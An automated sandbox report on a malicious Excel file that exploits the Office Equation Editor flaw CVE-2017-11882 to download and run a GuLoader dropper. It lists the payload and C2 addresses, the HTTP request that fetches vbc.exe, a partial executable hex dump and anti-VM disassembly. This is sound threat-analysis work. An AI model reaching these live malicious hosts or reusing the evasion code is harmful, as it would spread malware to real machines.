Loading ...

Play interactive tourEdit tour

Windows Analysis Report destinations.xlsx

Overview

General Information

Sample Name:destinations.xlsx
Analysis ID:502631
MD5:a4bb01370caeb6363f6dc7923585481e
SHA1:3eff08923d9b179edcc99fe52d95a46755eac939
SHA256:c45eacade4845c8cf141724b92d6fd4401d30233b18b17e295d2d7a9a8944c40
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2004 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2792 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 684 cmdline: 'C:\Users\Public\vbc.exe' MD5: 8777020A37B6797241A489A707B9784B)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.121.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 684
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 684

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}
    Antivirus detection for URL or domainShow sources
    Source: http://192.3.121.153/00800800/vbc.exeAvira URL Cloud: Label: malware
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 27%Perma Link
    Source: C:\Users\Public\vbc.exeVirustotal: Detection: 27%Perma Link
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 44MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://implantecapilarpereira.com/NetGen
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 05:37:49 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 13 Oct 2021 14:42:26 GMTETag: "33000-5ce3cf88aac57"Accept-Ranges: bytesContent-Length: 208896Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 f7 ea 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 02 00 00 50 00 00 00 00 00 00 7c 13 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 ea 02 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 e0 02 00 28 00 00 00 00 10 03 00 26 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d4 02 00 00 10 00 00 00 e0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 13 00 00 00 f0 02 00 00 10 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 26 25 00 00 00 10 03 00 00 30 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /00800800/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.121.153Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.121.153
    Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /00800800/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.121.153Connection: Keep-Alive

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A557A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B474A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AE400
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A087E
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B00B4
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A00C6
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AECDD
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A7574
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00294AA2
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B130A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A4B8B
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A6BF6
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1BCE
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A557A NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$destinations.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDE0E.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/15@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A474 push ebp; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040E9CB push ecx; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004191F0 push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004131A3 push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004086CE push eax; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00411ACE push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004132DE push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0041729D push edx; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040DAAA push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040E6B3 push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00417AB9 push eax; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A750 push ss; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00411B06 push ecx; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00407B81 push esi; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B4084 push FFFFFF94h; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00291611 push esi; iretd
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00292A10 push FFFFFF94h; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0029465A push ebx; retf
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00291327 push esi; iretd
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00291366 push esi; iretd
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002967BC push es; ret
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A6BF6 push FFFFFF94h; retf
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002AF8E2 second address: 00000000002AF8E2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3AB33088h 0x00000007 sub eax, 03336DF3h 0x0000000c xor eax, 78D04D3Fh 0x00000011 xor eax, 4FAF8FABh 0x00000016 cpuid 0x00000018 popad 0x00000019 jmp 00007F9204BA6819h 0x0000001e cmp eax, edx 0x00000020 call 00007F9204BA66EAh 0x00000025 lfence 0x00000028 mov edx, 337D36F1h 0x0000002d xor edx, 66E5A0A3h 0x00000033 xor edx, 9D6B538Dh 0x00000039 xor edx, B70DC5CBh 0x0000003f mov edx, dword ptr [edx] 0x00000041 lfence 0x00000044 jmp 00007F9204BA681Dh 0x00000049 test cl, bl 0x0000004b ret 0x0000004c sub edx, esi 0x0000004e ret 0x0000004f add edi, edx 0x00000051 dec dword ptr [ebp+000000F8h] 0x00000057 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005e jne 00007F9204BA66CCh 0x00000060 call 00007F9204BA685Fh 0x00000065 call 00007F9204BA6846h 0x0000006a lfence 0x0000006d mov edx, 337D36F1h 0x00000072 xor edx, 66E5A0A3h 0x00000078 xor edx, 9D6B538Dh 0x0000007e xor edx, B70DC5CBh 0x00000084 mov edx, dword ptr [edx] 0x00000086 lfence 0x00000089 jmp 00007F9204BA681Dh 0x0000008e test cl, bl 0x00000090 ret 0x00000091 mov esi, edx 0x00000093 pushad 0x00000094 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2844Thread sleep time: -240000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AF8DA rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AF8DA rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AC054 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002AE990 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002A46A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1BCE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002B474A RtlAddVectoredExceptionHandler,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
